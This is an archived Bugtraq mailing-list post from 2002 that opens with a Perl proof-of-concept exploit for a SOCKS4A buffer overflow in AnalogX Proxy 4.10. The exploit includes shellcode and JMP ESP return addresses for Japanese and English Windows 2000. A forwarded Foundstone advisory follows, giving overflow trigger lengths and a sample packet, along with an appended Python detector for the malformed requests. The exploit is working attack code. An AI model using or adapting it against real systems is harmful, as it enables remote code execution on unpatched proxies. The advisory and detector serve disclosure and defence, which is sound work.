Bugtraq mailing list archives

Re: Foundstone Advisory - Buffer Overflow in AnalogX Proxy (fwd)


From: Kanatoko <anvil () jumperz net>
Date: Sat, 27 Jul 2002 04:21:48 +0900


This is a proof of concept exploit for AnalogX Proxy SOCKS4A buffer
overflow. Tested on Japanese Windows 2000 Professional SP2.

#!/usr/local/bin/perl

#-----------------------------------------------------------
# AnalogX Proxy Version 4.10 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil () jumperz net>
# http://www.jumperz.net/
# thanx to: hsj (http://hsj.shadowpenguin.org/)
#-----------------------------------------------------------
use Socket;

$connect_host = "socks.example.com";
$port = 1080;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

        # egg written by UNYUN (http://www.shadowpenguin.org/)
        # 57bytes
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

$buf  = "\x04\x01\x00\x19\x00\x00\x00\x01";
$buf .= "A" x 32;
$buf .= $egg;
$buf .= "\x00";
$buf .= "A" x 144;

        # JMP ESP in user32.dll( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
        # If you use English Windows 2000, try 0x77E2492B
$buf .= "\x2B\x49\xdf\x77";

        # JMP +0x22
$buf .= "\xEB\x22";
$buf .= "\x00";

print SOCKET $buf;


--
Kanatoko  <anvil () jumperz net>
JUMPER : http://www.jumperz.net/(Japanese)



On Mon, 1 Jul 2002 15:54:55 -0600 (MDT)
Dave Ahmad <da () securityfocus com> wrote:



Dave Ahmad
SecurityFocus
www.securityfocus.com

---------- Forwarded message ----------
Subject: Foundstone Advisory - Buffer Overflow in AnalogX Proxy
Date: Mon, 1 Jul 2002 14:37:44 -0700
From: "Foundstone Labs" <labs () foundstone com>
To: <da () securityfocus com>

----------------------------------------------------------------------
FS Advisory ID:                 FS-070102-23-AXPR

Release Date:                   July 1st, 2002

Product:                        AnalogX Proxy

Vendor:                         AnalogX (http://www.analogx.com)

Vendor Advisory:                See vendor web site

Type:                           Buffer Overflow

Severity:                       High

Author:                         Robin Keir (robin.keir () foundstone com)
                                Foundstone, Inc.
                                (http://www.foundstone.com)

Operating Systems:              Windows variants

Vulnerable versions:            Proxy v4.07 and previous

Foundstone Advisory:            http://www.foundstone.com/advisories.htm
----------------------------------------------------------------------

Description

A buffer overflow exists in AnalogX's Proxy software.
Exploitation of this vulnerability allows remote execution of
arbitrary code with the privileges of the Proxy daemon.

Details

Web Proxy overflow

Sending an HTTP proxy request to the target system on TCP port 6588
consisting of a single space character followed by 320 or more
non-space characters followed by 2 carriage-return linefeeds causes
a read access violation in the application. Manually dismissing the
application error message box that is displayed on the affected system
at this point will terminate the process. If the message box is not
manually dismissed then repeated sending of the request causes repeated
access violation message boxes to appear on the affected system up to
the point where the service no longer responds.

Different numbers of bytes sent cause different error conditions
to occur, such as write access violations and Watcom memory
error dialogs.

Socks4a buffer overflow

Sending a Socks4a request to the target system on TCP port 1080 consisting
of a hostname section of 140 or more characters will cause a write access
violation application error. Manually dismissing the application error
message box that is displayed on the affected system at this point will
terminate the process. If the message box is not manually dismissed then
repeated sending of the request causes repeated access violation message
boxes to appear on the affected system up to the point where the service
no longer responds.

An example TCP packet to send is

\x04\x01\x04\x38\x00\x00\x00abcd\x00#\x00

where the '\xXX' characters signify their corresponding HEX binary values
and the '#' is substituted with the DNS name of 140 or more characters.

Solution:

Refer to the vendor's web site for further details:
http://www.analogx.com

Credits:

Foundstone would like to thank AnalogX for their prompt
response and handling of this problem.


Disclaimer:

The information contained in this advisory is copyright (c) 2002
Foundstone, Inc. and is believed to be accurate at the time of
publishing, but no representation of any warranty is given,
express, or implied as to its accuracy or completeness. In no
event shall the author or Foundstone be liable for any direct,
indirect, incidental, special, exemplary or consequential
damages resulting from the use or misuse of this information.
This advisory may be redistributed, provided that no fee is
assigned and that the advisory is not modified in any way.
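
As an added defensive example, not part of Kanatoko's post or the Foundstone advisory, the following Python parses a SOCKS4a request and flags the two malformed request shapes the advisory describes, using the thresholds it gives (a hostname of 140 or more bytes; a single space followed by 320 or more non-space bytes and two CRLFs). The sample packets and all function names are constructed here for illustration.

```python
import re

# Thresholds as stated in the Foundstone advisory.
SOCKS4A_HOSTNAME_LIMIT = 140   # hostname of 140+ bytes triggers the SOCKS4a fault
HTTP_TOKEN_LIMIT = 320         # single space + 320+ non-space bytes + CRLFCRLF

def parse_socks4a(pkt: bytes):
    """Parse a SOCKS4/4a request: VN(1) CD(1) DSTPORT(2) DSTIP(4) USERID NUL [HOST NUL].
    The 4a form is signalled by DSTIP = 0.0.0.x with x != 0, after which a
    NUL-terminated hostname follows. Returns a dict, or None if incomplete/invalid."""
    if len(pkt) < 9 or pkt[0] != 4 or pkt[1] not in (1, 2):
        return None
    port = int.from_bytes(pkt[2:4], "big")
    ip = pkt[4:8]
    userid, sep, rest = pkt[8:].partition(b"\x00")
    if not sep:
        return None
    hostname = None
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:
        hostname, sep, _ = rest.partition(b"\x00")
        if not sep:
            return None
    return {"port": port, "ip": ip, "userid": userid, "hostname": hostname}

def socks4a_overflow_attempt(pkt: bytes) -> bool:
    """True when a well-formed SOCKS4a request carries a hostname at or over the limit."""
    req = parse_socks4a(pkt)
    return (req is not None and req["hostname"] is not None
            and len(req["hostname"]) >= SOCKS4A_HOSTNAME_LIMIT)

def http_overflow_attempt(req: bytes) -> bool:
    """True for the web-proxy trigger shape: one leading space, 320+ non-space
    bytes, then exactly two CRLFs (the advisory's port-6588 case)."""
    return re.fullmatch(rb" \S{%d,}\r\n\r\n" % HTTP_TOKEN_LIMIT, req) is not None

# Constructed sample traffic (not captures from the advisory or the exploit).
BENIGN_SOCKS4A = (b"\x04\x01\x00\x50\x00\x00\x00\x01"      # CONNECT example.com:80
                  + b"user\x00" + b"example.com\x00")
LONG_HOST_SOCKS4A = (b"\x04\x01\x04\x38\x00\x00\x00\x01"   # advisory's packet shape
                     + b"abcd\x00" + b"a" * 140 + b"\x00")
BENIGN_HTTP = b"GET http://example.com/ HTTP/1.0\r\n\r\n"
LONG_TOKEN_HTTP = b" " + b"X" * 320 + b"\r\n\r\n"

if __name__ == "__main__":
    for name, pkt in [("benign socks4a", BENIGN_SOCKS4A), ("long host", LONG_HOST_SOCKS4A)]:
        print(name, socks4a_overflow_attempt(pkt))
    for name, req in [("benign http", BENIGN_HTTP), ("long token", LONG_TOKEN_HTTP)]:
        print(name, http_overflow_attempt(req))
```

The same checks can be applied on a proxy front end or IDS to drop or alert on requests before they reach a version of the proxy that has not been updated.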




